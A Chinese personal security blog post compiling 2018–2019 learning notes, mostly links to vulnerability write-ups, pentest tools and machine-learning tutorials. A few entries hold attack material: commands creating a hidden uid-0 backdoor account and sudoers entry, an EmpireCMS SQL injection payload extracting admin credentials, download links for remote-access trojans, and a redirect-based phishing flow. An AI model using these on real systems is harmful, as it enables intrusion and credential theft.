零散的转载文章知识点记录(不定时更新)

  • by

简单来说:就是大杂烩,弃之可惜,食之无味,还是有点作用,就汇总于此

把这两年博客记录的零散转载文章汇总一下,方便搜索查阅(CTRL+F),不定时更新

1)博客中还有些转载文章,个人也花了很多时间去复现,就没有拉过来汇总,还是单独成文章

2)删除了很多自己都看不过去的知识点(不过当时个人既然选择记录,那么当时一定对自己提升有帮助),就直接删除掉

3)本来博客内容还想删除一些代码文章,但学习一段代码的知识点,再编写好,可能也花费了很多时间,就不删除了

4)本来还可以汇总一些 系列文章,也是考虑到循序渐进的问题,汇总起来不管是对于初学者来说,还是个人,看上去就更杂乱了

5)重构部分以前的文章,特别是安全相关的小结

持续添加:

待续

汇总:

phpcms9.6上传文件漏洞

https://blog.csdn.net/wy_97/article/details/77689031
https://www.webshell.cc/3918.html         –作者
去网上试了两个,都修补了,17年的漏洞,自己也懒得搭建环境了。
后台默认密码,admin phpcms

https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651073650&idx=2&sn=dead7dc5c21feac7f04876ac4df2a91c&chksm=bd1fbef98a6837efee8d597e8001d688a6de56c478cfe5abeb8ce01939f138d99c052b390dcf&xtrack=1&scene=0&subscene=131&clicktime=1551707805&ascene=7&devicetype=android-24&version=2700033a&nettype=WIFI&abtest_cookie=BAABAAoACwASABMABAAklx4AVpkeAMaZHgDWmR4AAAA%3D&lang=zh_CN&pass_ticket=%2BUqRM%2FK%2BXC6ZmMEyVTFH1FOQ7el7h6x%2FKCJfdfKm0W7o5tSCq5zPaeHQ5vrqk%2B6T&wx_header=1



三.str_shullfe函数分析

http://www.lz1y.cn/archives/1394.htm
https://xz.aliyun.com/t/1520
http://www.360zhijia.com/anquan/379326.html


OpenCart历史漏洞
OpenCart 是世界著名的开源电子商务系统
很详细的利用过程
http://www.bigdiao.cc/2018/05/24/Opencart-v3-0-2-0/
2018.10.2

Magento (麦进斗) 是一套专业开源的电子商务系统。
看网上的介绍,最近的漏洞都是16年的了,而且是商城漏洞(利用的都是随时更新的),利用价值不大
xss(易利用)
http://www.freebuf.com/vuls/94277.html
 
2018.10.3


1.

WordPress 4.4 SSRF(未测试)

https://blog.csdn.net/cd_xuyue/article/details/52276443
2.
sql漏洞,很大一部分都要管理员权限
3.
4.9.6即,任意文件删除漏洞
4.
Wordpress 4.6远程代码执行漏洞(不能是虚拟主机头,限制条件颇多)
http://www.freebuf.com/vuls/133860.html
5.
插件的漏洞,无研究,wpscan扫描
 
2018.10.3

今天在看一个站是是动易cms,就去搜索了下历史漏洞
这个cms有一些漏洞
https://yq.aliyun.com/ziliao/90435
http://yl-hacker.lofter.com/post/1d85eef9_8c78698
https://item.btime.com/m_935a4441724e9f76c
http://tech.powereasy.net/Item/4317.aspx
 
2018.10.7

espcms SQL 注入漏洞
admin权限,数字型逃脱,但是一个很不错的初学审计思路
https://6xian.github.io/2018/04/22/codes-audit-basic-espcms-numeric-sqli/
 
2018.10.14


利用php自包含特性上传webshell
其中的思路是真的骚
http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/5234.html
 
2018.10.14

登陆框引发的血案
很帮的思路和介绍
http://www.52bug.cn/content/plugins/openlink/viewPage.html?url=http://www.freebuf.com/articles/web/174408.html
http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/5238.html
 
2018.10.14


2016百度杯12月第四场挑战赛解题过程记录
虽然作者除了测字符编码sql,其他时候一般都不测sql的,但是这个思路还是不错的
https://blog.csdn.net/qq_30123355/article/details/58161312


XSSi漏洞实现用户信息窃取
http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/5267.html
 
2018.10.14


浅谈smb会话劫持具体实现

http://sec.chinabyte.com/223/8992223.shtml
2018.10.14

通过APACHE ACCESS LOG来利用LFI漏洞
怎么说呢,看过多次这种类型的,文件包含加一句话日志;条件还是不易满足的
http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/5339.html

2018.10.14

xst攻击
简单讲,就是在trace开启且有xss的情况下,能获得httponly的值
http://blog.sina.com.cn/s/blog_539f058a0102v2de.html
https://yq.aliyun.com/ziliao/96439
http://www.freebuf.com/sectool/11917.html
http://www.hackdig.com/?01/hack-11.htm
 
2018.10.14

WebLogic 反序列化远程命令执行漏洞(CVE-2018-3245)

cve-2018-10933预警

http盲攻击
https://bbs.ichunqiu.com/thread-28064-1-1.html?from=aqzx8
个人理解
1.不清楚的情况下盲攻击
2.get 和 post的waf规则不同
 
 
2018.10.19

CVE-2016-3714 – ImageMagick

16年的
在16年的乌云上常看见类似漏洞
http://www.mottoin.com/tech/115986.html
 
2018.10.19

乌云镜像库


很不错的web学习思路
有现成的就不建议自己搭建了
https://bugs.shuimugan.com/
 
2018.10.22


csrf的防御
有些文章讲的很好,就没必要再重复了;二者博主也懒
http://www.4hou.com/web/13973.html
 
2018.10.24


在meterpreter中进行NTLM中继攻击

http://www.4hou.com/technology/13303.html
smb中继攻击:http://netsecurity.51cto.com/art/201403/433007.htm

2018.10.25


D-Link无线接入点中存在的REC漏洞

http://www.4hou.com/vulnerable/13886.html
CVE-2018-17440,CVE-2018-17442,CVE-2018-17443,CVE-2018-17441
 
2018.10.24


推荐书籍《汇编语言》

ssrf(二)
ssrf
https://www.freebuf.com/column/157466.html
https://www.t00ls.net/articles-41070.html
https://blog.csdn.net/u010726042/article/details/77806775
https://www.cnblogs.com/s0ky1xd/p/5859049.html

内网渗透(端口复用)
http://mobile.51cto.com/hot-557084.htm
https://baike.baidu.com/item/%E7%AB%AF%E5%8F%A3%E5%A4%8D%E7%94%A8/10845889?fr=aladdin
https://xz.aliyun.com/t/1661
 
 
2018.11.4


reg+proxychains的内网转发
https://blog.csdn.net/na_tion/article/details/47728121

2018.11.5


汇编语言(输出字符到dos)

看demo应该是输入内容到寄存器,再由特殊的操作指令操作
https://blog.csdn.net/jiujiu28/article/details/52096453
 
2018.11.9


汇编语言(串操作)
https://blog.csdn.net/pengwill97/article/details/79249867
 
2018.11.9

fck漏洞
仅作记录
https://www.uedbox.com/fckeditor-latest-vulnerabilities/ fck
https://blog.csdn.net/wizardforcel/article/details/50695885 fck
 
2018.11.17


路由器漏洞的利用工具

1.Routerhunter
https://github.com/sh1nu11bi/Routerhunter-2.0
2.
https://www.freebuf.com/sectool/101441.html
https://www.92aq.com/2016/05/09/routersploit.html
下载:https://github.com/threat9/routersploit
使用方法2:
https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/linksys/eseries_themoon_rce.md
本来测试了一个站点,但是未利用成功
 
2018.11.18

10款工具

其中介绍的工具感觉还比较有趣,不知道是不是实时更新的
https://www.sohu.com/a/215329854_100008608
 
2018.11.18

2016 年度开源中国新增开源软件排行榜 TOP 100

https://blog.csdn.net/xiaobing_122613/article/details/54374966
 
 
2018.11.19


linux添加root权限
https://www.cnblogs.com/SofuBlue/p/8027110.html
echo "tom321?" | passwd --stdin "tom"
echo "tom ALL=(ALL) ALL" >> /etc/sudoers
useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof
 
2018.11.21

zANTI工具(安卓渗透)
https://www.freebuf.com/sectool/115051.html
 
2018.11.22


Termux (安卓渗透)
无需root
https://blog.csdn.net/u010475354/article/details/79675893
http://www.cnblogs.com/BlogOfMr-Leo/p/7788103.html
 
2018.11.22

python setup.py编写和 requirements.txt

1.
pip安装单个安装
2.
setup.py编写
https://www.cnblogs.com/maociping/p/6633948.html
3.
requirements.txt
生成requirements.txt文件
pip freeze > requirements.txt
安装requirements.txt依赖
pip install -r requirements.txt
 
2018.11.27



pentestlabs域渗透(无法练习)
openvpn由于GFW原因无法练习,就简单记录下
https://lab.pentestit.ru/pentestlabs/7   网址
https://www.anquanke.com/post/id/153946 教程
 
2018.12.2


木马感染的一种思路
https://www.360zimeiti.com/chuangyetuijian/44970.html
 
2018.12.3


利用Cobalt strike一步步教你发送钓鱼邮件

https://www.freebuf.com/sectool/124905.html
 
2018.12.3



saml的xss漏洞
(https://www.freebuf.com/vuls/190464.html)

saml学习  即sso单点登录(https://www.cnblogs.com/shuidao/p/3463947.html)


2018.12.13



cewl爬虫进行字典生成工具(转载)以及cupp社工进行字典生成工具



1.

cupp

(https://blog.csdn.net/qq_33936481/article/details/51286643)

https://github.com/Mebus/cupp

2.

cewl

kali自带

cewl通过爬行网站获取关键信息创建一个密码字典

(http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/5548.html)

2018.12.13


ThinkPHP v5漏洞


不废话了,已经是个漏洞利用,预警都过了

自己最近半个月也没怎么关注qq群消息,现在记录一笔

(https://www.freebuf.com/vuls/191785.html) 其中直接有利用代码

2018.12.17


参数污染的逻辑漏洞



本来搜索p2p安全,恰巧看到这个,就记录一下

(http://www.91ri.org/17187.html)

2018.12.18

burp2.0下载



(https://pan.baidu.com/s/1coxRc0ns99y-d3zcKqZnQg) jkyk

2018.12.19


浅谈Web业务&应用逻辑缺陷-议题


(https://pan.baidu.com/s/103ufZnngHD8Kq6eVmY_KfQ) nrk8

还未下载,仅作记录

2018.12.19

swpuctf

(https://qvq.im/post/swpuctf%202018%20web%20writeup)

(https://www.anquanke.com/post/id/168338)

2018.12.19


burp插件CO2

https://blog.csdn.net/cjx529377/article/details/81490750

2018.12.22

django基础知识学习


基于java收费问题引申对GPL的思考


(https://blog.csdn.net/szwangdf/article/details/27191085 (听说java要收费了的了解)

(https://blog.csdn.net/szwangdf/article/details/27191085(关于gpl的理解 收费与开源的理解)

(https://bbs.csdn.net/topics/330267544(使用不等于必须开源)

(http://tech2ipo.com/56635

个人暂时理解 不对代码本身造成修改 仅使用链接库等操作的商业行为不需必须开源

还在思考 oracle 收费mysql的区别和问题 按照链接文章作者的意思 本身mysql是开源的软件 可任意使用 oracle卖的是服务,这给博主遗留了问题 商业授权和个人授权

2018.12.25


Typhoon靶机渗透测试(转载)


由于时间原因,博主也没有进行测试,不过感觉知识温习着也不错,思路都是那样的

(https://www.anquanke.com/post/id/168877

没有什么特别出彩的地方

就是nmap msf进行漏扫,拿shell 提权等

2018.12.30

concurrent.futures的使用
就是几个注意事项吧

数字别太大 博主的电脑20就够了 然后还有一系列其他操作不多说

https://blog.csdn.net/SmallTankPy/article/details/79960739

https://stackoverflow.com/questions/34770169/using-concurrent-futures-without-running-out-of-ram

异步实现多线程

具体的还真没什么说的

2018.1.11


sqlmap的tamper脚本编写
接着上篇写的,tamper脚本进行嵌套

可参考:https://blog.csdn.net/whatday/article/details/62059263

tamper有三个部分

第一部分:

执行脚本的优先级

priority = PRIORITY.HIGHER

第二部分

版本,或者是适用条件

def dependencies():
singleTimeWarnMessage(“tamper script ‘%s’ is only meant to be run against %s < 5.1” % (os.path.basename(file).split(“.”)[0], DBMS.MYSQL))

第三部分

我们关注的点,作者看了下,简单点就行替换,把union select替换成什么就行了

retVal = retVal.replace(” /!0″, “/!0″)

无成果 自己研究下

2019.1.11


argparser模块的使用



一个写脚本 命令行的使用 简化了自己写脚本时的判断条件

参考:https://www.jianshu.com/p/fef2d215b91d

基础用法

arg = ArgumentParser(description='Web_Information_Collect By Naivete')
arg.add_argument('-u', '--url', help='url site', dest='url')
arg.add_argument('-d', '--domain', help='domain site', dest='domain', )
arg.add_argument('-A', '--ALL', help='url site', dest='ALL')
result = arg.parse_args()

2019.1.12


Java — implements与extends的区别和联系


有趣的知识点

初学时专门记录一笔

参考:https://blog.csdn.net/weixin_39938767/article/details/80056922

(http://www.runoob.com/java/java-interfaces.html)

接口是降低耦合性 必须实现接口中的方法

继承 java中只能单继承,所谓多继承不过是1到2 2到3

所以有了接口和继承和混合使用以及区别联系,疑难点

2018.1.13

burp上的Jython环境安装


有点坑

参考:http://www.nxadmin.com/penetration/1363.html

下载标准版本的jython http://www.jython.org/downloads.html

2019.1.14


iis短文件



http://www.lijiejie.com/iis-win8-3-shortname-brute/ IIS短文件名暴力猜解漏洞分析
https://www.test404.com/post-745.html?wafcloud=1
https://github.com/lijiejie/IIS_shortname_Scanner/blob/master/iis_shortname_Scan.py

2019.1.19


CmsEasy 5.5form.php代码执行漏洞



参考:https://github.com/hongriSec/PHP-Audit-Labs/tree/master/Part1/Day8/files

分析采用了溯源法 从/e 到渲染前台

虽然复杂 但确实没有什么说的

2019.1.25


延时注入代替sleep和benchmark



暂时积累在此,思路还是蛮有用的:

https://xz.aliyun.com/t/2288
https://www.cdxy.me/?p=789

2019.1.25


SSRF攻击的新角度–利用编程语言中的URL parser

在看PHP-Audit-Labs-Day16-ctf遇到一个很有意思的知识点,特此记录

参考:http://www.arkteam.net/?p=3499

2019.1.26

Discuz x3.4前台SSRF


很有趣的案例,记得上次成信的比赛就是这个

参考:https://www.cnblogs.com/iamstudy/articles/discuz_x34_ssrf_1.html

原理是博主记录的上上篇(至于为什么要分开写 ,嗯 ,1 2关系吧)

http://47.106.140.244/2019/01/ssrf%e6%94%bb%e5%87%bb%e7%9a%84%e6%96%b0%e8%a7%92%e5%ba%a6-%e5%88%a9%e7%94%a8%e7%bc%96%e7%a8%8b%e8%af%ad%e8%a8%80%e4%b8%ad%e7%9a%84url-parser/

2019.1.26


SSRF漏洞中绕过IP限制的几种方法总结


仅作记录

博主目前也只看到这几种方法

参考:https://www.freebuf.com/articles/web/135342.html

2019.1.26

从Blind XXE漏洞到读取Root文件的系统提权


1.https://www.freebuf.com/vuls/194112.html

参考:https://www.freebuf.com/vuls/194489.html

个人觉得蛮有意思,top前十,只可惜很少测试到

2019.1.27


利用Redis配置不当的漏洞对linux服务器root提权


一直在说配置,今天去看了下,老漏洞

参考:https://www.huangdc.com/443

2019.1.28

phpweb漏洞合集



今天测试网站的遇到一个老版cms(最近一次更新在2015年)

由于是静态的(伪静态),博主测试了历史的几个payload都没有用,不纠结,记录在这

参考链接:https://www.cnblogs.com/hookjoy/p/4302052.html

2019.1.29


木马终端远控




学习这么久安全,还没有专门拿款远控

建议去github上找软件,因为下面这些坑定都不免杀,github上找的由于小众,自己用还是不错的,博主由于感觉费时,就没有去试,就不在这推荐了

灰鸽子 下载
 http://www.downcc.com/soft/101223.html
 使用教程
 http://blog.sina.com.cn/s/blog_499e8e5f01000a0n.html
 冰河木马下载
 http://www.jz5u.com/Soft/network/tel/142067.html
 教程
 https://blog.csdn.net/bcbobo21cn/article/details/51873976
 http://www.greenxf.com/soft/152354.html
 https://blog.csdn.net/zhangxuechao_/article/details/80029566
 Remcos
 https://www.easyaq.com/news/638353972.shtml  解读
 有意思的dg远控分析
 DG远程控制木马
 http://www.windows510.com/xiazai/caozuojiaocheng/860_1.html
 大灰狼下载:
 http://www.jz5u.com/Soft/softdown.asp?softid=84750

2019.1.29



2019年一月阶段总结,二月计划

一月总结

1.一月再次接触了java的基础语法 试着编写了burp的xss插件(一开始就是打算学习语言为主)
2.完成了 PHP-Audit-Labs 项目的学习
3.完成漏洞银行以往大咖ppt和视频学习
二月计划:

该做的到目前阶段基本都做了,了解清楚了,接下来努力的提升和熟练技能和知识

1.

本来打算挖挖src,翻了下,有点难;所以还是挑厂商挖挖(7-8天)

2.

审计问题,审计两套CMS源码(7-8天)

3.

两个国外网站的一条龙渗透(7-8)

4.

学习新知识,暂定linux下的运维知识学习(7-8)

2019.1.29


hackheep与HackRequests的学习介绍



这个hackhttp库 博主看到三四次吧,感觉还不错

参考:

https://github.com/BugScanTeam/hackhttp

https://github.com/boy-hack/hack-requests

两者都是类似的,个人较满意其中的raw方式和返回包


2019.1.30


XSStrike工具


最近在测试网站的时候,遇到搜索框的xss 发现以前的payload和方法不够用

记得以前做过记录,忘了,再做一次

参考:https://www.jb51.net/article/119867.htm

2019.1.31


shiyanlouscan漏洞扫描脚本雏形


这个脚本实用性不强,甚至很少

参考:https://github.com/boy-hack/shiyanlouscan

博主大致看了下脚本内容

其内容用的函数库全部都是大众的,难度也没有

但框架很雏形基础,值得学习

1.

fuzzcdn,作者利用了360的接口,现在好像无法使用了

2.

cms识别就是通常的特征路径md5值

3.

webshell,dir,portscan,xss等正常的不能再正常了

就是请求,分析

2019.2.1

airbug脚本检测CMS漏洞
以前记录过AngelSword这款cms的漏洞利用脚本,airbug这款脚本和 AngelSword 的区别博主大致看了下,airbug是利用poc josn格式一样的插件来做(这种方式方法值得借鉴),相比较添加比较方便,但是cms收集检测的poc没有 AngelSword 多(airbug原作者的定位也不单单是cms的poc收集)

个人没有测试

参考:https://github.com/boy-hack/airbug

2019.2.1

js进行http请求


这两天在写一个web界面的交互,需要用到html和js

ui直接改,js还是要自己写

记录如下:https://www.jb51.net/article/143683.htm

而博主用到的就是post的请求

2019.2.4

使用Python3自带工具2to3.py 转换 Python2.x 代码 到Python3

转换是一个比较麻烦的事情,保证了语法,还有考虑类库的使用

参考:https://www.cnblogs.com/wushuaishuai/p/7611915.html

2019.2.6

new_w8scan脚本

参考:https://github.com/boy-hack/new_w8scan

大致翻了下,两个py文件

主文件的框架真的好,前前后后(其中弱密码,目录,端口等可参考)

但就实用性,个人认为专门的目标用专门的工具就ok了

博主原先想在自己的online脚本添加密码爆破的,麻烦不说,关键效果不好

2019.2.7

帝国cms注入漏洞

测试遇到,比较老的洞,仅做记录

参考:https: // www.cnblogs.com / milantgh / p / 5450982.
html

Step1.在“姓名”处输入:縗

Step2.在“联系邮箱”处输入:, 1, 1, 1, (select concat(username, 0x5f, password, 0x5f, rnd)
from phome_enewsuser where

userid = 1), 1, 1, 1, 0, 0, 0) / *

Step3.“留言内容”随意填写,输入完毕后点击“提交”按钮。

2019.2
.10

帝国cms前台xss漏洞


测试遇到,也不是最新的,目标网站还上了waf

参考:https://www.freebuf.com/vuls/177969.html

其中的iframe嵌套,再康康

2019.2.10

科讯CMS漏洞



参考:http://www.weixianmanbu.com/article/1312.html

利用了asp的解析问题,搜了下,大的本身漏洞都比较老了

2019.2.10


python列表去重


博主目前接触分成三种

参考:https://www.cnblogs.com/nyist-xsk/p/7473236.html

1是python工具函数库

2是set函数

3是自己写函数来去重

一般使用set函数

b=list(set(b))

2019.2.14

bash:no job control in this shell

Socks代理反弹突破内网

一篇比较老的文章

当作一个积累

参考:https://www.freebuf.com/articles/system/12182.html

工具下载:https://sourceforge.net/projects/ssocks/

2019.2.16

抓取安卓模拟器请求包


跟电脑版本差不多,只是要下个安卓的模拟器

本来想用手机,结果刷机刷死了,还好用的以前的老手机,郁闷

参考:

http://www.xunart.com/h477323.html
https://blog.csdn.net/xiaohua_de/article/details/80259920
https://blog.csdn.net/xusirwiner/article/details/82660289
https://blog.csdn.net/xyz846/article/details/78963245
https://www.freebuf.com/articles/terminal/103128.html(安卓移动终端的一次渗透实验 )

模拟器:夜神,逍遥

抓包:bp fd

2019.2.20


安卓使用Termux做渗透测试(转载)

参考:

https://blog.csdn.net/s1986q/article/details/78383406

http://blackwolfsec.cc/2016/12/10/termux/(可详细看下,渗透相关)

微型linux手机app,类似kali,apt安装

了解记录下,效果 说实话,没有试过,但是是把电脑操作搬到手机上,可想不是具体环境,用处不如操作方便的大

2019.2.20


分布式Web漏洞扫描平台WDScanner


有需要的赶紧下吧,也许过两天就没有了,还没有测试效果,还不知道效果怎样

参考:https://www.freebuf.com/sectool/195642.html

下载:https://github.com/TideSec/WDScanner

2019.2.22

2019年二月阶段总结,三月计划

二月总结:

1.挖了几天洞,感觉不怎么挖得动

2.计划的2套cms源码并没有审计

3.利用了几个国外的网站进行了内网渗透的熟悉,当然其中web漏洞都是直接找的可以getshell的

4.linux下的运维再探,学校发的那本教材(《跟阿铭学Linux》),书籍后续部分个人目前阶段没有实用性,打算跟着老师作业,暂时只解决了书籍前边感兴趣的部分

补充学习了:

5.为什么没有去审计cms源码,就是补充学习了《Micro8系列文章》,内网渗透的知识

6.还有就shellcode以及pwn的了解
三月计划:

1.pwn的学习(5-6)

2.网站的渗透(7-8)

3.java的基础知识以及核心知识的再补充(4-5)

4.研究分析下工作技能表(5-6)

5.一套cms源码的审计(4-5)

6.《加密与解密》观看与读后感

7.web安全的一本书,暂未定

2019.2.28


《电子取证与python方法》读后感


入门书籍吧,翻了下,就是教你写规范写python,用相关库(3,4个)

不知道另一本《电子取证》这本书籍怎样。

2019.3.4


第三方账号登陆劫持


有趣的知识点

第三方账号登陆劫持:
https://xz.aliyun.com/t/3514 很强的
https://03i0.com/2018/04/01/OAuth%E5%9B%9E%E8%B0%83%E5%8F%82%E6%95%B0%E6%BC%8F%E6%B4%9E%E6%A1%88%E4%BE%8B%E8%A7%A3%E6%9E%90/
https://www.cnblogs.com/hookjoy/p/4109680.html 利用窗口引用漏洞和XSS漏洞实现浏览器劫持
https://cloud.tencent.com/developer/news/105364


2019.3.7


组合拳进行xss,csrf到getshell


文章比较老,思路很值得学习

参考:https://www.secpulse.com/archives/47040.html

2019.3.8


利用网站URL跳转漏洞欺骗邮箱密码


挖到一个注册成功后的url跳转(这种比较常见)

下面这个思路很好,但是里面的登陆页面是自己的网址,也就是只能欺骗欺骗安全意识弱的用户

参考:https://www.jb51.net/hack/5434.html

跳转后的页面我们可以控制,所以流程可以被我们改为:注册–处理注册信息–注册成功–跳转到伪造的登录页面–用户输入密码点登录–提交密码给我们–最后跳转到mail.target.com。

2019.3.9


burpsuite插件xssvalidate使用
有一些GitHub上的脚本可以使用BruteXSS-1-master和XSStrike

这篇记录的是xssvalidate,一款利用burp插件加载的步骤

参考:https://blog.csdn.net/m0_37268841/article/details/79961956

2019.3.10

实验吧-溢出-vpn



一个简单的占位,查看函数地址的题

参考:

https://blog.csdn.net/qq_41071646/article/details/80640475
http://www.shiyanbar.com/ctf/writeup/4856

后面的printf倒转是故意留下进行地址的修改的,也是常见的以后ret常用的思路

2019.3.18


vmware的硬件选项里有关于虚拟化引擎的选项(



上一篇个人在思考怎样提高脚本运行在虚拟机的速率,归根到底还是cpu的问题,刚调虚拟机硬件设置看到处理器的虚拟化设置(虚拟化引擎)

个人认为全开效果好点

参考:https://blog.csdn.net/qq_32907349/article/details/51491555

1.其中Intel VT-x/EPT和AMD-V/RVI(V)

虚拟机可以直接运行在最高级别 ,不用经过【 虚拟机的进程在要先从虚拟机ring3转到ring0,再从物理机的ring3转到ring0 】这个过程

2.虚拟化cpu性能计数器

3.虚拟化io内存管理单元

2019.4.6


Ngrok内网穿透



没有vps时考虑

/ https://www.anquanke.com/post/id/84590

2019.4.7


微信公众号《一本黑》推荐


平时少灌点鸡汤文

这里推荐一个黑产介绍或者互联网上防御诈骗的一些科普文的一个公众号,个人觉得还是蛮有趣,蛮实际的, 下午操作系统课上都在看 ,比一些什么鸡汤文好多了,鸡汤文不是不看,是少看,关键时候捞一把就行了,天天灌就弱智了

微信搜索:一本黑

有介绍电信诈骗的,有介绍一些赌博平台的,有介绍一些生活中的一些互联网骗局的。。。。(广告自行判断)


2019.4.29


python输出时间
参考:https://www.cnblogs.com/kerwinC/p/5760811.html

wordpress设置时间倒计时
参考:https://boke112.com/6317.html

下载安装:Countdown Timer Ultimate即可

2019.5.5


常见运维软件小结
最近确实有点无聊,搜索了一下,大概翻了翻,发现更多的运维的软件侧重于性能和集操作

上手可以nagios 预警,web界面

也不好测试,就翻翻了解下

https://www.zhihu.com/question/19636141 重点***
http://www.voidcn.com/article/p-skmupxuz-wq.html
https://www.jianshu.com/p/cdad9e198e9b
https://blog.csdn.net/enweitech/article/details/48177835
https://cloud.tencent.com/developer/information/%E8%BF%90%E7%BB%B4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E8%BD%AF%E4%BB%B6
https://cloud.tencent.com/developer/article/1181060
https://cloud.tencent.com/developer/article/1026825(ClusterShell)
https://cloud.tencent.com/developer/article/1114395(运维好数据中心的四大法宝)

2019.5.6

wordpress后台统计
昨天晚上就守着测试了下,没意思,耗资源,撤下了

插件:

1.wp post

2.wp post count

3.堪比百度统计的WordPress 访客统计插件-WP Statistics(很强,具体看链接)

参考:http://www.wazhuti.com/3962.html

2019.5.12

机器学习– Kmeans算法
Kmeans算法:
https://juejin.im/post/5a97d129f265da239235c2eb
https://github.com/csuldw/MachineLearning/tree/master/Kmeans
https://www.cnblogs.com/pinard/p/6164214.html

机器学习–DBSCAN聚类算法
DBSCAN聚类算法:
https://www.cnblogs.com/pinard/p/6208966.html
https://plushunter.github.io/2017/02/23/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0%E7%AE%97%E6%B3%95%E7%B3%BB%E5%88%97%EF%BC%8811%EF%BC%89%EF%BC%9A%E8%81%9A%E7%B1%BB%EF%BC%883%EF%BC%89/

机器学习–隐马尔可夫
看不懂公式,看原理过程吧

参考:

隐式马尔科夫算法:
http://wulc.me/2017/07/14/%E9%9A%90%E9%A9%AC%E5%B0%94%E5%8F%AF%E5%A4%AB%E6%A8%A1%E5%9E%8B%E7%9A%84%E4%B8%89%E5%A4%A7%E9%97%AE%E9%A2%98%E5%8F%8A%E6%B1%82%E8%A7%A3%E6%96%B9%E6%B3%95/
转载:爱情的隐式马尔可夫模型(Love in the Hidden Markov Model)
https://www.cnblogs.com/skyme/p/4651331.html 其中的熵故事还是不错的 https://www.zhihu.com/question/20962240 ***重点 https://www.zhihu.com/question/20136144 如何通俗地讲解 viterbi 算法 https://www.cnblogs.com/CheeseZH/p/4229910.html python代码 https://blog.csdn.net/qq_37334135/article/details/86302735 https://wenku.baidu.com/view/40faab93aef8941ea66e0563.html 原理图解 https://blog.csdn.net/u012771351/article/details/53114829 HMM之Baum-Welch算法 https://cloud.tencent.com/developer/article/1091267 EM算法学习 https://blog.csdn.net/u014688145/article/details/53046765 (隐马尔可夫模型之Baum-Welch算法详解) 三个问题,三种经典解决方法 机器学习–逻辑回归算法 逻辑回归: https://www.jianshu.com/p/4cf34bf158a1 一 https://www.jianshu.com/p/c67548909e99 二 https://zhuanlan.zhihu.com/p/41132059 三 http://fitzeng.org/2018/02/11/MLLinearRegression/ 机器学习基本算法之线性回归 https://blog.csdn.net/u013355826/article/details/77506079 python一步一步实现(不过是手动找回归函数等式) https://blog.csdn.net/chibangyuxun/article/details/53148005 sklearn https://juejin.im/post/5a9507196fb9a06351729cd5 一步一步分析 一步一步用代码实现 https://juejin.im/post/5a87a7026fb9a063475f8706 nice 最后来写代码 https://blog.csdn.net/ligang_csdn/article/details/53838743 公式推导 https://blog.csdn.net/LY_ysys629/article/details/72887927 整体代码编写 ** 2019.5.14 机器学习–朴素贝叶斯 没什么说的,朴素贝叶斯的理论与推导相对简单 https://www.jianshu.com/p/748ea7e71dc8 nice https://www.jiqizhixin.com/graph/technologies/8d4d7c16-ddb0-496f-89c4-0b22b7029ee0 https://zhuanlan.zhihu.com/p/37575364 https://blog.csdn.net/Wang_Jiankun/article/details/81065844 实现 2019.5.15 机器学习–支持向量机 支持向量机: https://zhuanlan.zhihu.com/p/28660098 https://blog.csdn.net/v_JULY_v/article/details/7624837 https://blog.csdn.net/kamidox/article/details/50212549 https://www.jiqizhixin.com/articles/2018-10-17-20 https://bainingchao.github.io/2018/10/16/%E4%B8%80%E6%AD%A5%E6%AD%A5%E6%95%99%E4%BD%A0%E8%BD%BB%E6%9D%BE%E5%AD%A6%E6%94%AF%E6%8C%81%E5%90%91%E9%87%8F%E6%9C%BASVM%E7%AE%97%E6%B3%95%E4%B9%8B%E6%A1%88%E4%BE%8B%E7%AF%872/ https://bainingchao.github.io/2018/10/16/%E4%B8%80%E6%AD%A5%E6%AD%A5%E6%95%99%E4%BD%A0%E8%BD%BB%E6%9D%BE%E5%AD%A6%E6%94%AF%E6%8C%81%E5%90%91%E9%87%8F%E6%9C%BASVM%E7%AE%97%E6%B3%95/ 初学机器学习的良心帖(转载) 一篇初次了解机器学习,非常非常棒的帖子:https://36kr.com/p/5109465 翻了下,初次学习与了解大概就这些内容: https://zhuanlan.zhihu.com/p/33982890 https://github.com/allmachinelearning/MachineLearning/blob/master/notes/MLMaterials.md https://blog.csdn.net/q361239731/article/details/81012904 https://www.jqhtml.com/down/935.html 2019.5.16 机器学习–图算法与知识图谱 图算法与知识图谱: https://www.jiqizhixin.com/articles/2018-06-20-4 知识图谱通俗易懂 https://zhuanlan.zhihu.com/p/25498681 https://blog.csdn.net/gqtcgq/article/details/45618279 https://www.cnblogs.com/v-July-v/archive/2011/02/14/1983678.html 图算法10大算法 https://www.msra.cn/zh-cn/news/features/embedding-knowledge-graph-in-recommendation-system-i 知识图谱案例 http://pelhans.com/2018/04/19/xiaoxiangkg-note4/ 2019.5.16 再次从网上填充一些python脚本工具 不得不吐槽,安全工具轮子太多了,翻了下,都在写相关脚本,个人应该不会再写相关的,直接拿来用,甚至组装都不会组装了(发现不重构,直接组装在一起的脚本,效率真的不如一个脚本一个脚本使用) freebuf.com与anquanke.com每天都有很多文章,个人也是过一段时间想起才会去翻一些积累知识 这篇是昨晚翻阅freebuf 19年的安全工具脚本文章,所做的记录 https://www.freebuf.com/articles/web/202560.html 识别工具一些小结(nice) https://www.freebuf.com/sectool/195642.html 分布式Web漏洞扫描平台WDScanner (符合自己要做的,待测试) https://www.freebuf.com/sectool/202375.html wpscan12在线扫描(符合自己要做的,待测试) https://github.com/knownsec/pocsuite3 https://github.com/Xyntax/POC-T 经典脚本 钓鱼邮件利用操作:https://www.freebuf.com/articles/web/201868.html https://www.freebuf.com/vuls/202379.html 挖洞经验 | 用绕过姿势形成SSRF获取印度最大股票经纪公司AWS密码凭据 https://www.freebuf.com/news/202991.html 暗网华尔街 https://www.freebuf.com/articles/web/202560.html 识别工具 指纹识别 https://www.freebuf.com/articles/web/202579.html 抓包 https://www.freebuf.com/articles/network/202483.html Kubebot:一款Google云平台下的Slackbot安全测试工具 https://www.freebuf.com/sectool/194269.html 